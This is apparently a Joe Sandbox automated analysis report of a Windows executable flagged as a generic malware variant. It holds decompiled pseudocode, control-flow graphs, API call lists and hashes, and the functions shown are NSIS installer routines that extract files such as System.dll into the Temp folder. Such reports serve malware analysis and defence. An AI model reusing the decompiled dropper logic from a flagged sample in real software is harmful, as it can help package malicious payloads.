                                                                          • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                        • RegisterClassW.USER32 ref: 00403EBC
                                                                        • SystemParametersInfoW.USER32 ref: 00403ED4
                                                                        • CreateWindowExW.USER32 ref: 00403F09
                                                                        • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                        • GetClassInfoW.USER32 ref: 00403F6B
                                                                        • GetClassInfoW.USER32 ref: 00403F78
                                                                        • RegisterClassW.USER32 ref: 00403F81
                                                                        • DialogBoxParamW.USER32 ref: 00403FA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                        • API String ID: 1975747703-3761740343
                                                                        • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                        • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                        • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                        • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 597 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 600 403120-403125 597->600 601 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 597->601 602 40336a-40336e 600->602 609 403243-403251 call 40302e 601->609 610 40315e 601->610 616 403322-403327 609->616 617 403257-40325a 609->617 612 403163-40317a 610->612 614 40317c 612->614 615 40317e-403187 call 4035e2 612->615 614->615 622 40318d-403194 615->622 623 4032de-4032e6 call 40302e 615->623 616->602 619 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 617->619 620 40325c-403274 call 4035f8 call 4035e2 617->620 648 4032d4-4032d9 619->648 649 4032e8-403318 call 4035f8 call 403371 619->649 620->616 644 40327a-403280 620->644 626 403210-403214 622->626 627 403196-4031aa call 406113 622->627 623->616 634 403216-40321d call 40302e 626->634 635 40321e-403224 626->635 627->635 646 4031ac-4031b3 627->646 634->635 637 403233-40323b 635->637 638 403226-403230 call 406b22 635->638 637->612 647 403241 637->647 638->637 644->616 644->619 646->635 651 4031b5-4031bc 646->651 647->609 648->602 658 40331d-403320 649->658 651->635 653 4031be-4031c5 651->653 653->635 655 4031c7-4031ce 653->655 655->635 657 4031d0-4031f0 655->657 657->616 659 4031f6-4031fa 657->659 658->616 660 403329-40333a 658->660 663 403202-40320a 659->663 664 4031fc-403200 659->664 661 403342-403347 660->661 662 40333c 660->662 665 403348-40334e 661->665 662->661 663->635 666 40320c-40320e 663->666 664->647 664->663 665->665 667 403350-403368 call 406113 665->667 666->635 667->602
                                                                        C-Code - Quality: 99%
                                                                        			E004030D0(void* __eflags, signed int _a4) {
                                                                        				DWORD* _v8;
                                                                        				DWORD* _v12;
                                                                        				intOrPtr _v16;
                                                                        				long _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				signed int _v40;
                                                                        				short _v560;
                                                                        				signed int _t54;
                                                                        				void* _t57;
                                                                        				void* _t62;
                                                                        				intOrPtr _t65;
                                                                        				void* _t68;
                                                                        				intOrPtr* _t70;
                                                                        				intOrPtr _t71;
                                                                        				signed int _t77;
                                                                        				signed int _t82;
                                                                        				signed int _t83;
                                                                        				signed int _t89;
                                                                        				intOrPtr _t92;
                                                                        				long _t94;
                                                                        				signed int _t102;
                                                                        				signed int _t104;
                                                                        				void* _t106;
                                                                        				signed int _t107;
                                                                        				signed int _t110;
                                                                        				void* _t111;
                                                                        
                                                                        				_t94 = 0;
                                                                        				_v8 = 0;
                                                                        				_v12 = 0;
                                                                        				 *0x42a26c = GetTickCount() + 0x3e8;
                                                                        				GetModuleFileNameW(0, L"C:\\Users\\engineer\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe", 0x400);
                                                                        				_t106 = E00406158(L"C:\\Users\\engineer\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe", 0x80000000, 3);
                                                                        				 *0x40a018 = _t106;
                                                                        				if(_t106 == 0xffffffff) {
                                                                        					return L"Error launching installer";
                                                                        				}
                                                                        				E00406668(L"C:\\Users\\engineer\\Desktop", L"C:\\Users\\engineer\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe");
                                                                        				E00406668(0x439000, E00405F83(L"C:\\Users\\engineer\\Desktop"));
                                                                        				_t54 = GetFileSize(_t106, 0);
                                                                        				__eflags = _t54;
                                                                        				 *0x420f00 = _t54;
                                                                        				_t110 = _t54;
                                                                        				if(_t54 <= 0) {
                                                                        					L24:
                                                                        					E0040302E(1);
                                                                        					__eflags =  *0x42a274 - _t94;
                                                                        					if( *0x42a274 == _t94) {
                                                                        						goto L32;
                                                                        					}
                                                                        					__eflags = _v12 - _t94;
                                                                        					if(_v12 == _t94) {
                                                                        						L28:
                                                                        						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                        						_t111 = _t57;
                                                                        						E00406B90(0x40ce68);
                                                                        						E00406187(0x40ce68,  &_v560, L"C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
                                                                        						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                                                                        						__eflags = _t62 - 0xffffffff;
                                                                        						 *0x40a01c = _t62;
                                                                        						if(_t62 != 0xffffffff) {
                                                                        							_t65 = E004035F8( *0x42a274 + 0x1c);
                                                                        							 *0x420f04 = _t65;
                                                                        							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                        							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                                                                        							__eflags = _t68 - _v20;
                                                                        							if(_t68 == _v20) {
                                                                        								__eflags = _v40 & 0x00000001;
                                                                        								 *0x42a270 = _t111;
                                                                        								 *0x42a278 =  *_t111;
                                                                        								if((_v40 & 0x00000001) != 0) {
                                                                        									 *0x42a27c =  *0x42a27c + 1;
                                                                        									__eflags =  *0x42a27c;
                                                                        								}
                                                                        								_t45 = _t111 + 0x44; // 0x44
                                                                        								_t70 = _t45;
                                                                        								_t102 = 8;
                                                                        								do {
                                                                        									_t70 = _t70 - 8;
                                                                        									 *_t70 =  *_t70 + _t111;
                                                                        									_t102 = _t102 - 1;
                                                                        									__eflags = _t102;
                                                                        								} while (_t102 != 0);
                                                                        								_t71 =  *0x420ef4; // 0x24d7b
                                                                        								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
                                                                        								E00406113(0x42a280, _t111 + 4, 0x40);
                                                                        								__eflags = 0;
                                                                        								return 0;
                                                                        							}
                                                                        							goto L32;
                                                                        						}
                                                                        						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                        					}
                                                                        					E004035F8( *0x420ef0);
                                                                        					_t77 = E004035E2( &_a4, 4);
                                                                        					__eflags = _t77;
                                                                        					if(_t77 == 0) {
                                                                        						goto L32;
                                                                        					}
                                                                        					__eflags = _v8 - _a4;
                                                                        					if(_v8 != _a4) {
                                                                        						goto L32;
                                                                        					}
                                                                        					goto L28;
                                                                        				} else {
                                                                        					do {
                                                                        						_t107 = _t110;
                                                                        						asm("sbb eax, eax");
                                                                        						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                                                                        						__eflags = _t110 - _t82;
                                                                        						if(_t110 >= _t82) {
                                                                        							_t107 = _t82;
                                                                        						}
                                                                        						_t83 = E004035E2(0x418ef0, _t107);
                                                                        						__eflags = _t83;
                                                                        						if(_t83 == 0) {
                                                                        							E0040302E(1);
                                                                        							L32:
                                                                        							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                        						}
                                                                        						__eflags =  *0x42a274;
                                                                        						if( *0x42a274 != 0) {
                                                                        							__eflags = _a4 & 0x00000002;
                                                                        							if((_a4 & 0x00000002) == 0) {
                                                                        								E0040302E(0);
                                                                        							}
                                                                        							goto L20;
                                                                        						}
                                                                        						E00406113( &_v40, 0x418ef0, 0x1c);
                                                                        						_t89 = _v40;
                                                                        						__eflags = _t89 & 0xfffffff0;
                                                                        						if((_t89 & 0xfffffff0) != 0) {
                                                                        							goto L20;
                                                                        						}
                                                                        						__eflags = _v36 - 0xdeadbeef;
                                                                        						if(_v36 != 0xdeadbeef) {
                                                                        							goto L20;
                                                                        						}
                                                                        						__eflags = _v24 - 0x74736e49;
                                                                        						if(_v24 != 0x74736e49) {
                                                                        							goto L20;
                                                                        						}
                                                                        						__eflags = _v28 - 0x74666f73;
                                                                        						if(_v28 != 0x74666f73) {
                                                                        							goto L20;
                                                                        						}
                                                                        						__eflags = _v32 - 0x6c6c754e;
                                                                        						if(_v32 != 0x6c6c754e) {
                                                                        							goto L20;
                                                                        						}
                                                                        						_a4 = _a4 | _t89;
                                                                        						_t104 =  *0x420ef0; // 0x0
                                                                        						 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                                                                        						_t92 = _v16;
                                                                        						__eflags = _t92 - _t110;
                                                                        						 *0x42a274 = _t104;
                                                                        						if(_t92 > _t110) {
                                                                        							goto L32;
                                                                        						}
                                                                        						__eflags = _a4 & 0x00000008;
                                                                        						if((_a4 & 0x00000008) != 0) {
                                                                        							L16:
                                                                        							_v12 = _v12 + 1;
                                                                        							_t110 = _t92 - 4;
                                                                        							__eflags = _t107 - _t110;
                                                                        							if(_t107 > _t110) {
                                                                        								_t107 = _t110;
                                                                        							}
                                                                        							goto L20;
                                                                        						}
                                                                        						__eflags = _a4 & 0x00000004;
                                                                        						if((_a4 & 0x00000004) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						goto L16;
                                                                        						L20:
                                                                        						__eflags = _t110 -  *0x420f00; // 0x1425
                                                                        						if(__eflags < 0) {
                                                                        							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                                                                        						}
                                                                        						 *0x420ef0 =  *0x420ef0 + _t107;
                                                                        						_t110 = _t110 - _t107;
                                                                        						__eflags = _t110;
                                                                        					} while (_t110 != 0);
                                                                        					_t94 = 0;
                                                                        					__eflags = 0;
                                                                        					goto L24;
                                                                        				}
                                                                        			}
































                                                                        0x004030db
                                                                        0x004030de
                                                                        0x004030e1
                                                                        0x004030fb
                                                                        0x00403100
                                                                        0x00403113
                                                                        0x00403118
                                                                        0x0040311e
                                                                        0x00000000
                                                                        0x00403120
                                                                        0x00403131
                                                                        0x00403142
                                                                        0x00403149
                                                                        0x0040314f
                                                                        0x00403151
                                                                        0x00403156
                                                                        0x00403158
                                                                        0x00403243
                                                                        0x00403245
                                                                        0x0040324a
                                                                        0x00403251
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403257
                                                                        0x0040325a
                                                                        0x00403286
                                                                        0x0040328b
                                                                        0x00403296
                                                                        0x00403298
                                                                        0x004032a9
                                                                        0x004032c4
                                                                        0x004032ca
                                                                        0x004032cd
                                                                        0x004032d2
                                                                        0x004032f1
                                                                        0x00403301
                                                                        0x00403313
                                                                        0x00403318
                                                                        0x0040331d
                                                                        0x00403320
                                                                        0x00403329
                                                                        0x0040332d
                                                                        0x00403335
                                                                        0x0040333a
                                                                        0x0040333c
                                                                        0x0040333c
                                                                        0x0040333c
                                                                        0x00403344
                                                                        0x00403344
                                                                        0x00403347
                                                                        0x00403348
                                                                        0x00403348
                                                                        0x0040334b
                                                                        0x0040334d
                                                                        0x0040334d
                                                                        0x0040334d
                                                                        0x00403350
                                                                        0x00403357
                                                                        0x00403363
                                                                        0x00403368
                                                                        0x00000000
                                                                        0x00403368
                                                                        0x00000000
                                                                        0x00403320
                                                                        0x00000000
                                                                        0x004032d4
                                                                        0x00403262
                                                                        0x0040326d
                                                                        0x00403272
                                                                        0x00403274
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040327d
                                                                        0x00403280
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040315e
                                                                        0x00403163
                                                                        0x00403168
                                                                        0x0040316c
                                                                        0x00403173
                                                                        0x00403178
                                                                        0x0040317a
                                                                        0x0040317c
                                                                        0x0040317c
                                                                        0x00403180
                                                                        0x00403185
                                                                        0x00403187
                                                                        0x004032e0
                                                                        0x00403322
                                                                        0x00000000
                                                                        0x00403322
                                                                        0x0040318d
                                                                        0x00403194
                                                                        0x00403210
                                                                        0x00403214
                                                                        0x00403218
                                                                        0x0040321d
                                                                        0x00000000
                                                                        0x00403214
                                                                        0x0040319d
                                                                        0x004031a2
                                                                        0x004031a5
                                                                        0x004031aa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004031ac
                                                                        0x004031b3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004031b5
                                                                        0x004031bc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004031be
                                                                        0x004031c5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004031c7
                                                                        0x004031ce
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004031d0
                                                                        0x004031d6
                                                                        0x004031df
                                                                        0x004031e5
                                                                        0x004031e8
                                                                        0x004031ea
                                                                        0x004031f0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004031f6
                                                                        0x004031fa
                                                                        0x00403202
                                                                        0x00403202
                                                                        0x00403205
                                                                        0x00403208
                                                                        0x0040320a
                                                                        0x0040320c
                                                                        0x0040320c
                                                                        0x00000000
                                                                        0x0040320a
                                                                        0x004031fc
                                                                        0x00403200
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040321e
                                                                        0x0040321e
                                                                        0x00403224
                                                                        0x00403230
                                                                        0x00403230
                                                                        0x00403233
                                                                        0x00403239
                                                                        0x00403239
                                                                        0x00403239
                                                                        0x00403241
                                                                        0x00403241
                                                                        0x00000000
                                                                        0x00403241

                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 004030E4
                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,00000400), ref: 00403100
                                                                          • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,80000000,00000003), ref: 0040615C
                                                                          • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,80000000,00000003), ref: 00403149
                                                                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                        • API String ID: 2803837635-1926347440
                                                                        • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                        • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                        • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                        • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 734 40176f-401794 call 402da6 call 405fae 739 401796-40179c call 406668 734->739 740 40179e-4017b0 call 406668 call 405f37 lstrcatW 734->740 746 4017b5-4017b6 call 4068ef 739->746 740->746 749 4017bb-4017bf 746->749 750 4017c1-4017cb call 40699e 749->750 751 4017f2-4017f5 749->751 759 4017dd-4017ef 750->759 760 4017cd-4017db CompareFileTime 750->760 753 4017f7-4017f8 call 406133 751->753 754 4017fd-401819 call 406158 751->754 753->754 761 40181b-40181e 754->761 762 40188d-4018b6 call 4056ca call 403371 754->762 759->751 760->759 763 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 761->763 764 40186f-401879 call 4056ca 761->764 776 4018b8-4018bc 762->776 777 4018be-4018ca SetFileTime 762->777 763->749 798 401864-401865 763->798 774 401882-401888 764->774 778 402c33 774->778 776->777 780 4018d0-4018db FindCloseChangeNotification 776->780 777->780 781 402c35-402c39 778->781 783 4018e1-4018e4 780->783 784 402c2a-402c2d 780->784 786 4018e6-4018f7 call 4066a5 lstrcatW 783->786 787 4018f9-4018fc call 4066a5 783->787 784->778 792 401901-402398 786->792 787->792 796 40239d-4023a2 792->796 797 402398 call 405cc8 792->797 796->781 797->796 798->774 799 401867-401868 798->799 799->764
                                                                        C-Code - Quality: 77%
                                                                        			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                        				void* __esi;
                                                                        				void* _t35;
                                                                        				void* _t43;
                                                                        				void* _t45;
                                                                        				FILETIME* _t51;
                                                                        				FILETIME* _t64;
                                                                        				void* _t66;
                                                                        				signed int _t72;
                                                                        				FILETIME* _t73;
                                                                        				FILETIME* _t77;
                                                                        				signed int _t79;
                                                                        				WCHAR* _t81;
                                                                        				void* _t83;
                                                                        				void* _t84;
                                                                        				void* _t86;
                                                                        
                                                                        				_t77 = __ebx;
                                                                        				 *(_t86 - 8) = E00402DA6(0x31);
                                                                        				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                                        				_t35 = E00405FAE( *(_t86 - 8));
                                                                        				_push( *(_t86 - 8));
                                                                        				_t81 = L"Call";
                                                                        				if(_t35 == 0) {
                                                                        					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
                                                                        				} else {
                                                                        					E00406668();
                                                                        				}
                                                                        				E004068EF(_t81);
                                                                        				while(1) {
                                                                        					__eflags =  *(_t86 + 8) - 3;
                                                                        					if( *(_t86 + 8) >= 3) {
                                                                        						_t66 = E0040699E(_t81);
                                                                        						_t79 = 0;
                                                                        						__eflags = _t66 - _t77;
                                                                        						if(_t66 != _t77) {
                                                                        							_t73 = _t66 + 0x14;
                                                                        							__eflags = _t73;
                                                                        							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                                        						}
                                                                        						asm("sbb eax, eax");
                                                                        						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                        						__eflags = _t72;
                                                                        						 *(_t86 + 8) = _t72;
                                                                        					}
                                                                        					__eflags =  *(_t86 + 8) - _t77;
                                                                        					if( *(_t86 + 8) == _t77) {
                                                                        						E00406133(_t81);
                                                                        					}
                                                                        					__eflags =  *(_t86 + 8) - 1;
                                                                        					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                        					__eflags = _t43 - 0xffffffff;
                                                                        					 *(_t86 - 0x38) = _t43;
                                                                        					if(_t43 != 0xffffffff) {
                                                                        						break;
                                                                        					}
                                                                        					__eflags =  *(_t86 + 8) - _t77;
                                                                        					if( *(_t86 + 8) != _t77) {
                                                                        						E004056CA(0xffffffe2,  *(_t86 - 8));
                                                                        						__eflags =  *(_t86 + 8) - 2;
                                                                        						if(__eflags == 0) {
                                                                        							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                        						}
                                                                        						L31:
                                                                        						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                                                        						__eflags =  *0x42a2e8;
                                                                        						goto L32;
                                                                        					} else {
                                                                        						E00406668("C:\Users\engineer\AppData\Local\Temp\nsyEAEC.tmp", _t83);
                                                                        						E00406668(_t83, _t81);
                                                                        						E004066A5(_t77, _t81, _t83, "C:\Users\engineer\AppData\Local\Temp\nsyEAEC.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                                        						E00406668(_t83, "C:\Users\engineer\AppData\Local\Temp\nsyEAEC.tmp");
                                                                        						_t64 = E00405CC8("C:\Users\engineer\AppData\Local\Temp\nsyEAEC.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                                        						__eflags = _t64;
                                                                        						if(_t64 == 0) {
                                                                        							continue;
                                                                        						} else {
                                                                        							__eflags = _t64 == 1;
                                                                        							if(_t64 == 1) {
                                                                        								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                                                        								L32:
                                                                        								_t51 = 0;
                                                                        								__eflags = 0;
                                                                        							} else {
                                                                        								_push(_t81);
                                                                        								_push(0xfffffffa);
                                                                        								E004056CA();
                                                                        								L29:
                                                                        								_t51 = 0x7fffffff;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					L33:
                                                                        					return _t51;
                                                                        				}
                                                                        				E004056CA(0xffffffea,  *(_t86 - 8));
                                                                        				 *0x42a314 =  *0x42a314 + 1;
                                                                        				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                                        				 *0x42a314 =  *0x42a314 - 1;
                                                                        				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                                        				_t84 = _t45;
                                                                        				if( *(_t86 - 0x24) != 0xffffffff) {
                                                                        					L22:
                                                                        					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                                        				} else {
                                                                        					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                                        					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                                        						goto L22;
                                                                        					}
                                                                        				}
                                                                        				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                                                        				__eflags = _t84 - _t77;
                                                                        				if(_t84 >= _t77) {
                                                                        					goto L31;
                                                                        				} else {
                                                                        					__eflags = _t84 - 0xfffffffe;
                                                                        					if(_t84 != 0xfffffffe) {
                                                                        						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                                                                        					} else {
                                                                        						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                                        						lstrcatW(_t81,  *(_t86 - 8));
                                                                        					}
                                                                        					_push(0x200010);
                                                                        					_push(_t81);
                                                                        					E00405CC8();
                                                                        					goto L29;
                                                                        				}
                                                                        				goto L33;
                                                                        			}


















                                                                        0x0040176f
                                                                        0x00401776
                                                                        0x00401782
                                                                        0x00401785
                                                                        0x0040178a
                                                                        0x0040178d
                                                                        0x00401794
                                                                        0x004017b0
                                                                        0x00401796
                                                                        0x00401797
                                                                        0x00401797
                                                                        0x004017b6
                                                                        0x004017bb
                                                                        0x004017bb
                                                                        0x004017bf
                                                                        0x004017c2
                                                                        0x004017c7
                                                                        0x004017c9
                                                                        0x004017cb
                                                                        0x004017d0
                                                                        0x004017d0
                                                                        0x004017db
                                                                        0x004017db
                                                                        0x004017ec
                                                                        0x004017ee
                                                                        0x004017ee
                                                                        0x004017ef
                                                                        0x004017ef
                                                                        0x004017f2
                                                                        0x004017f5
                                                                        0x004017f8
                                                                        0x004017f8
                                                                        0x004017ff
                                                                        0x0040180e
                                                                        0x00401813
                                                                        0x00401816
                                                                        0x00401819
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040181b
                                                                        0x0040181e
                                                                        0x00401874
                                                                        0x00401879
                                                                        0x004015b6
                                                                        0x0040292e
                                                                        0x0040292e
                                                                        0x00402c2a
                                                                        0x00402c2d
                                                                        0x00402c2d
                                                                        0x00000000
                                                                        0x00401820
                                                                        0x00401826
                                                                        0x0040182d
                                                                        0x0040183a
                                                                        0x00401845
                                                                        0x0040185b
                                                                        0x0040185b
                                                                        0x0040185e
                                                                        0x00000000
                                                                        0x00401864
                                                                        0x00401864
                                                                        0x00401865
                                                                        0x00401882
                                                                        0x00402c33
                                                                        0x00402c33
                                                                        0x00402c33
                                                                        0x00401867
                                                                        0x00401867
                                                                        0x00401868
                                                                        0x00401493
                                                                        0x0040239d
                                                                        0x0040239d
                                                                        0x0040239d
                                                                        0x00401865
                                                                        0x0040185e
                                                                        0x00402c35
                                                                        0x00402c39
                                                                        0x00402c39
                                                                        0x00401892
                                                                        0x00401897
                                                                        0x004018a5
                                                                        0x004018aa
                                                                        0x004018b0
                                                                        0x004018b4
                                                                        0x004018b6
                                                                        0x004018be
                                                                        0x004018ca
                                                                        0x004018b8
                                                                        0x004018b8
                                                                        0x004018bc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004018bc
                                                                        0x004018d3
                                                                        0x004018d9
                                                                        0x004018db
                                                                        0x00000000
                                                                        0x004018e1
                                                                        0x004018e1
                                                                        0x004018e4
                                                                        0x004018fc
                                                                        0x004018e6
                                                                        0x004018e9
                                                                        0x004018f2
                                                                        0x004018f2
                                                                        0x00401901
                                                                        0x00401906
                                                                        0x00402398
                                                                        0x00000000
                                                                        0x00402398
                                                                        0x00000000

                                                                        APIs
                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                          • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                          • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,004030A8), ref: 00405725
                                                                          • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll), ref: 00405737
                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
